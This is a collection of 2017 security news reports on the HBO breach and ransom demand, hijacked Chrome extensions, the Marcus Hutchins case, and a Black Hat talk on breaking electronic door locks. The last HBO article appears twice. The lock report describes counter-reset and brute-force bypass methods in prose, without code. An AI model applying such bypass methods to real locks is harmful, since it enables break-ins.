HBO has recently been facing trouble from a hacker or group of hackers who claimed to have obtained nearly 1.5 terabytes of information from the entertainment company.
Late last month, the unknown hackers dropped upcoming episodes of "Ballers" as well as "Room 104," along with a script of the fourth episode of "Game of Thrones" on the internet.
The leak was followed by another dump of a half-gigabyte sample of stolen HBO data, including HBO's emails, employment agreements, and balance sheets, along with the script of the upcoming Game of Thrones episode, demanding a ransom—nearly $6 Million in Bitcoins.
A recently leaked screenshot of an email from an HBO executive also suggested that the company offered hackers $250,000 and requested them to extend the ransom payment deadline by one week.
Sadly, the proposal apparently failed to satisfy the desires of HBO hackers, and they threatened to release more data from its 1.5 terabytes of stolen data every Sunday until the complete ransom of millions of dollars was paid.
However, the recent leak has nothing to do with hackers, and rather the new unreleased episode was accidentally broadcast by HBO Nordic in Spain for about an hour before it was removed, first spotted by Reddit users.
The new GOT episode was purportedly available via the HBO's Spanish on-demand service.
Here's what HBO has to say about the latest leak:
"We have learned that the upcoming episode of Game of Thrones was accidentally posted for a brief time on the HBO Nordic and HBO España platforms."
"The error appears to have originated with a third-party vendor, and the episode was removed as soon as it was recognized. This is not connected to the recent cyber incident at HBO in the US."
Short footage and GIFs from the GOT S07E06 was started circulating on YouTube, Reddit, Instagram, Twitch and other streaming services.
The episode 6 of "Game of Thrones" will officially be premiered on Sunday at 9 p.m. on HBO.


Hijacked Extensions Put 4.7 Million Chrome Users at Risk

16.8.2017 securityweek Hacking
More than 4.7 million users were apparently exposed to potentially malicious ads and credential theft after cybercriminals managed to hijack the developer accounts of several popular Chrome extensions.

The actors used phishing emails to gain access to the developers’ Google accounts and submit to the Chrome Web Store malicious versions of legitimate extensions. The malicious code injected in these tools was meant to modify the advertisements displayed to users and to grab specific credentials from the victims’ machines.

After taking a closer look at the incidents, Proofpoint concluded that 8 Chrome extensions have been compromised by the actor using the same modus operandi: Web Developer, Chrometana, Infinity New Tab, CopyFish, Web Paint, Social Fixer, TouchVPN, and Betternet VPN. At the moment, these extensions have a combined user base of more than 4.77 million users.

As previously reported, the phishing attack to compromise the developer accounts was pretty straightforward: an email purporting to come from Google Support prompted the targeted developers to log into their accounts to update some information. The login link in the email, however, would take developers to the attacker’s site instead, resulting in their credentials being stolen.

Next, the attackers would take over the compromised developer account and/or hijack their Chrome extension to replace it with a malicious variant. According to Proofpoint, the actor included in the code a check to ensure the extension has been installed for at least 10 minutes before starting the malicious behavior, most probably in an attempt to bypass detection.

The malicious code was also observed attempting to retrieve a remote file called ga.js over HTTPS, from a domain generated via a domain generation algorithm (DGA). Analysis of the malicious components in Web Developer revealed that the code from this step was meant to conditionally call additional scripts, including some that would harvest Cloudflare credentials after the victim’s login.

Next, “the compromised version of the extension attempts to substitute ads on the victim’s browser, hijacking traffic from legitimate advertising networks,” Proofpoint says, adding that the attackers focused mainly on carefully crafted substitution ads on adult websites, although they targeted a variety of other websites as well.

The ad substitutions work for 33 popular banner sizes including 468x60, 728x90, and many more spanning numerous aspect ratios, the researchers say. In many instances, the victims were presented with fake JavaScript alerts claiming that the computer required repairing. Clicking on these ads would redirect users to affiliate programs from which the threat actors could profit.

Proofpoint observed the compromised Web Developer extension directing victims to two such affiliates, but says that others may also have been used. The popup alerts were also associated with the compromise of the Infinity New Tab extension in May 2017, as well as with fake EU cookie-consent alerts last year.

“Threat actors continue to look for new ways to drive traffic to affiliate programs and effectively surface malicious advertisements to users. In the cases described here, they are leveraging compromised Chrome extensions to hijack traffic and substitute advertisements on victims’ browsers. Once they obtain developer credentials through emailed phishing campaigns, they can publish malicious versions of legitimate extensions. In addition to hijacking traffic and driving users to questionable affiliate programs, we have also observed them gathering and exfiltrating Cloudflare credentials, providing the actors with new means of potential future attacks,” Proofpoint concludes.


8 More Chrome Extensions Hijacked to Target 4.8 Million Users
16.8.2017 thehackernews Hacking
Google's Chrome web browser Extensions are under attack with a series of developers being hacked within last one month.
Almost two weeks ago, we reported how unknown attackers managed to compromise the Chrome Web Store account of a developer team and hijacked Copyfish extension, and then modified it to distribute spam correspondence to users.
Just two days after that incident, some unknown attackers then hijacked another popular extension 'Web Developer' and then updated it to directly inject advertisements into the web browser of over its 1 million users.
After Chris Pederick, the creator of 'Web Developer' Chrome extension that offers various web development tools to its users, reported to Proofpoint that his extension had been compromised, the security vendor analysed the issue and found further add-ons in the Chrome Store that had also been altered.
According to the latest report published by the researchers at Proofpoint on Monday, the expanded list of compromised Chrome Extensions are as below:
Chrometana (1.1.3)
Infinity New Tab (3.12.3)
CopyFish (2.8.5)
Web Paint (1.2.1)
Social Fixer (20.1.1)
Proofpoint researcher Kafeine also believes Chrome extensions TouchVPN and Betternet VPN were also compromised in the same way at the end of June.
In all the above cases, some unknown attackers first gained access to the developers' Google web accounts by sending out phishing emails with malicious links to steal account credentials.
Once the attackers gained access to the accounts, either they hijacked their respective extensions and then modified them to perform malicious tasks, or they add malicious Javascript code to them in an attempt to hijack traffic and expose users to fake ads and password theft in order to generate revenue.
In the case of the Copyfish extension, the attackers even moved the whole extension to one of its developers' accounts, preventing the software company from removing the infected extension from the Chrome store, even after being spotted compromised behaviour of the extension.
"Threat actors continue to look for new ways to drive traffic to affiliate programs and effectively surface malicious advertisements to users," researchers concluded. "In the cases described here, they are leveraging compromised Chrome extensions to hijack traffic and substitute advertisements on victims' browsers."
"Once they obtain developer credentials through emailed phishing campaigns, they can publish malicious versions of legitimate extensions."
At this time, it is unclear who is behind the hijackings of Chrome Web extensions.
The best way to protect yourself from such attacks is always to be suspicious of uninvited documents sent over a phishing email and never click on links inside those documents unless verifying the source.


Lawyer: British Hacking Suspect Will be Vindicated

15.8.2017 securityweek  Hacking
A lawyer for a 23-year-old British computer security researcher accused of creating malware to attack the banking system on Monday called him a "hero" and predicted he would be "fully vindicated."

The lawyer commented after Marcus Hutchins -- who three months ago found a "kill switch" to stem the spread of the devastating WannaCry ransomware outbreak -- pleaded not guilty to US charges of creating and distributing malicious software.

Hutchins was arrested earlier this month in Las Vegas after attending the Def Con gathering of computer hackers.

The case stunned the computer security community and drew fire from critics who argued that researchers often work with computer code which can be deployed for malicious purposes.

"Marcus Hutchins is a brilliant young man and a hero," said Marcia Hofmann, an attorney affiliated with the Electronic Frontier Foundation, a digital rights group, who represented Hutchins at the hearing.

"He is going to vigorously defend himself against these charges. And when the evidence comes to light we are confident he will be fully vindicated."

A federal indictment accuses Hutchins and another individual of making and distributing Kronos "banking Trojan," a reference to malicious software designed to steal user names and passwords used at online banking sites.

The indictment set the time of the activity by Hutchins as being from July 2014 to July 2015.

A trial date was set for the case for October 23, according to participants at the hearing, who added that a federal magistrate agreed to allow Hutchins to reside in California while the case is pending.

Hutchins, who lives in Britain and remains free on $30,000 bail, works for a California-based computer security firm.

"We are very pleased that the court modified the terms (of bail) allowing him to return to his important work," said Brian Klein, the second attorney for Hutchins.

His arrest has sparked criticism from some researchers who argue that the case could dissuade "white hat hackers" -- those who find flaws to help fix them -- from cooperating with authorities.

Hutchins, known by the alias "Malwaretech," was charged in an indictment dated July 12 and unsealed in early August by federal authorities in Wisconsin.

According to the indictment, Hutchins was part of a conspiracy to distribute the hacking tool on so-called dark markets.


Black Hat 2017 – Hacking the electronic locks to open the doors could be easy
9.8.2017 securityaffairs Hacking

Many times we have seen in movies hackers and spies breaking electronic locks with any kind of electrical equipment. Is it possible?
Many times, we have seen in movies hackers and spies breaking electronic locks with any kind of electrical equipment.

A pocket device that in a few seconds is able to try all the possible combination and find the correct one to open the door.

At Black Hat 2017 hacker conference, the expert Colin O’Flynn presented an interesting report on breaking electronic door locks.

O’Flynn focused his analysis on two samples of home electronic locks and he found the first model vulnerable to so-called Evil Maid attacks. The attacker needs the physical access to the lock’s internal component to add their own code to open the door whenever he needs.

The curious thing is that step-by-step instructions on how to add the code are reported right inside the battery compartment.

electronic locks attack

The expert noticed that the systems lack of authentication to enter the code, no user code or master code is requested.

The second model is vulnerable to a different attack from the outside. The outer part of the lock contains a module with a touch-screen for entering a PIN code that can be easily extracted by the attacker with a common knife to access the connector.

O’Flynn analyzed the way the external and internal components the lock interact and devised a device that appears exactly like the one used by hackers in the movie.

After studying how the external and internal parts of the lock interact,

The device could be used to brute-force the combination by directly connecting it to the connector. The attack works because there is no authentication in place to check with component communicates with the connector.

electronic locks hacking

The expert noticed a security measure implemented by the electronic lock manufacturer against brute-force attacks, after more than three incorrect tries the device triggers the alarm.
Nevertheless, O’Flynn discovered that it was possible to reset the counter of the failed-attempts by applying a certain voltage to the external connector’s contacts and causing the system reboot.

O’Flynn created a device that can check toughly 120 codes per minute, trying all possible four-digit PIN combinations for the electronic lock the entire process can take about 85 minutes in the worst case. The experts explained that in most cases, a half-hour to an hour is the time necessary to the hack.

O’Flynn also devised a method to discover the six-digits master code with an improved brute-force attack. Normally to discover a six-digit code it is necessary a week, but the expert noticed that when you enter the first four of six numbers of the master code, the system either shows an error message or waits for the other two numbers to be entered, confirming to the attacker that the first four digits are correct.

This method requires 85 minutes to brute-force the first four numbers of the master code and one minute more for the remaining two numbers. The attacker can then use the master code to reset the access code.

O’Flynn reported the issues to the electronic lock manufacturer, who confirmed that they will be fixed as soon as possible.

Electronic locks are still not totally secure!


HBO Hackers Demand Millions in Ransom Note

8.8.2017 securityweek Hacking
Hackers claiming to have breached HBO were demanding millions of dollars in ransom payments from the television group, while threatening to release more files from what is claimed to be a massive data breach.

A video circulating online directs a message to HBO chief Richard Plepler claiming that the group "obtained valuable information" in an attack that yielded a whopping 1.5 terabytes of data.

The message was authored by someone identified only as "Mr. Smith."

The website Databreaches.net reported that 10 files were leaked Monday as part of the demand including what may be another script of the popular fantasy series "Game of Thrones."

The video revealed a letter stating the hackers obtained "highly confidential" documents and data including scripts, contracts and personnel files.

"We want XXX dollars to stop leaking your data," the letter said, later alluding to a figure of half the group's annual budget of $12 million to $15 million.

It went on to say, "HBO spends 12 million for Market Research and 5 million for GOT7 advertisements. So consider us another budget for your advertisements!"

The message comes a week after a leak of one script of "Games of Thrones" and content from other productions.

The letter said HBO was the 17th target for the hacking group and that "only 3 of our past targets refused to pay and were punished very badly and 2 of them collapsed entirely."

HBO said in a statement that it believed that further leaks might emerge from the breach and that "the forensic review is ongoing."

"While it has been reported that a number of emails have been made public, the review to date has not given us a reason to believe that our email system as a whole has been compromised," the statement from the Time Warner unit said. "We continue to work around the clock with outside cybersecurity firms and law enforcement to resolve the incident."


Game of Thrones (Season 7) Episode 5 Script Leaked — Hacker Demands Millions in Ransom
8.8.2017 thehackernews Hacking

The hacking group that recently hacked HBO has just dropped its third trove of documents, including a month emails of one of the company's executives, and a detailed script of the upcoming fifth episode of "Game of Thrones" Season 7, set to be aired on August 13.
The latest release is the second leak from the hackers who claimed to have obtained around 1.5 terabytes of information from HBO, following the release of upcoming episodes of "Ballers" and "Room 104," and a script of the fourth episode of "Game of Thrones."
With the release of another half-gigabyte sample of its stolen HBO data, the hacking group has finally demanded a ransom worth millions of dollars from the entertainment giant in order to prevent further leaks.
The latest HBO data dump includes company's several internal documents, including emails, employment agreements, financial balance sheets, and marketing-strategy PDFs, along with the script of the yet-to-air 5th episode of Game of Thrones, all watermarked with "HBO is Falling."
The hackers reportedly sent a video message to HBO President and CEO Richard Plepler and demanded his "six-month salary in Bitcoin" — which is almost $6 Million — as a ransom for the stolen data otherwise they'll continue to leak.

In the video letter, written by "Mr. Smith" posing as the group of hackers behind the leak, the hackers demanded an unspecified amount of money from Plepler.
"We successfully breached into your huge network. HBO was one of our difficult targets to deal with, but we succeeded (it took about 6 months)," the letter reads as quoted by Wired.
"Our demand is clear and Non-Negotiable: We want XXXX dollars to stop leaking your Data. HBO spends 12 million for Market Research and 5 million for GOT7 advertisements. So consider us another budget for your advertisements!"
Last week when the hackers released the first batch of stolen data, HBO confirmed the cyber attack on its network but did not confirm how much data the hackers have stolen and whether it included upcoming episodes of the widely watched Game Of Thrones.
The ransom note adds that the deadline for that payment is only 3 days, but does not include a date. The video letter ends with an image of the "Night King" villain from Game of Thrones with his arms raised—the word "standing" in one hand and "falling" in the other.
Data Breaches also published some parts of the ransom demand the hackers, which call themselves white hats, sent to HBO.
In an internal email sent to to the HBO staff last week, Plepler said: "Many people have expressed particular concern about our e-mail system. At this time, we do not believe that our email system as a whole has been compromised, but the forensic review is ongoing."
HBO spokesperson Jeff Cusson told the publication that the company had been expecting more data to emerge from its data breach, but that the company's "forensic review is ongoing."
"The review to date has not given us a reason to believe that our email system as a whole has been compromised," Cusson says. "We continue to work around the clock with outside cyber security firms and law enforcement to resolve the incident."
If hackers have indeed stolen 1.5 terabytes of data from HBO and the company refuse to pay the ransom, users should expect more leaks of upcoming episodes from their favourite shows.
At this moment, it is still unclear who is behind the hack. We will update the story with the latest information.


Game of Thrones (Season 7) Episode 5 Script Leaked — Hacker Demands Millions in Ransom
8.8.2017 thehackernews Hacking

The hacking group that recently hacked HBO has just dropped its third trove of documents, including a month emails of one of the company's executives, and a detailed script of the upcoming fifth episode of "Game of Thrones" Season 7, set to be aired on August 13.
The latest release is the second leak from the hackers who claimed to have obtained around 1.5 terabytes of information from HBO, following the release of upcoming episodes of "Ballers" and "Room 104," and a script of the fourth episode of "Game of Thrones."
With the release of another half-gigabyte sample of its stolen HBO data, the hacking group has finally demanded a ransom worth millions of dollars from the entertainment giant in order to prevent further leaks.
The latest HBO data dump includes company's several internal documents, including emails, employment agreements, financial balance sheets, and marketing-strategy PDFs, along with the script of the yet-to-air 5th episode of Game of Thrones, all watermarked with "HBO is Falling."
The hackers reportedly sent a video message to HBO President and CEO Richard Plepler and demanded his "six-month salary in Bitcoin" — which is almost $6 Million — as a ransom for the stolen data otherwise they'll continue to leak.

In the video letter, written by "Mr. Smith" posing as the group of hackers behind the leak, the hackers demanded an unspecified amount of money from Plepler.
"We successfully breached into your huge network. HBO was one of our difficult targets to deal with, but we succeeded (it took about 6 months)," the letter reads as quoted by Wired.
"Our demand is clear and Non-Negotiable: We want XXXX dollars to stop leaking your Data. HBO spends 12 million for Market Research and 5 million for GOT7 advertisements. So consider us another budget for your advertisements!"
Last week when the hackers released the first batch of stolen data, HBO confirmed the cyber attack on its network but did not confirm how much data the hackers have stolen and whether it included upcoming episodes of the widely watched Game Of Thrones.
The ransom note adds that the deadline for that payment is only 3 days, but does not include a date. The video letter ends with an image of the "Night King" villain from Game of Thrones with his arms raised—the word "standing" in one hand and "falling" in the other.
Data Breaches also published some parts of the ransom demand the hackers, which call themselves white hats, sent to HBO.
In an internal email sent to to the HBO staff last week, Plepler said: "Many people have expressed particular concern about our e-mail system. At this time, we do not believe that our email system as a whole has been compromised, but the forensic review is ongoing."
HBO spokesperson Jeff Cusson told the publication that the company had been expecting more data to emerge from its data breach, but that the company's "forensic review is ongoing."
"The review to date has not given us a reason to believe that our email system as a whole has been compromised," Cusson says. "We continue to work around the clock with outside cyber security firms and law enforcement to resolve the incident."
If hackers have indeed stolen 1.5 terabytes of data from HBO and the company refuse to pay the ransom, users should expect more leaks of upcoming episodes from their favourite shows.
At this moment, it is still unclear who is behind the hack. We will update the story with the latest information.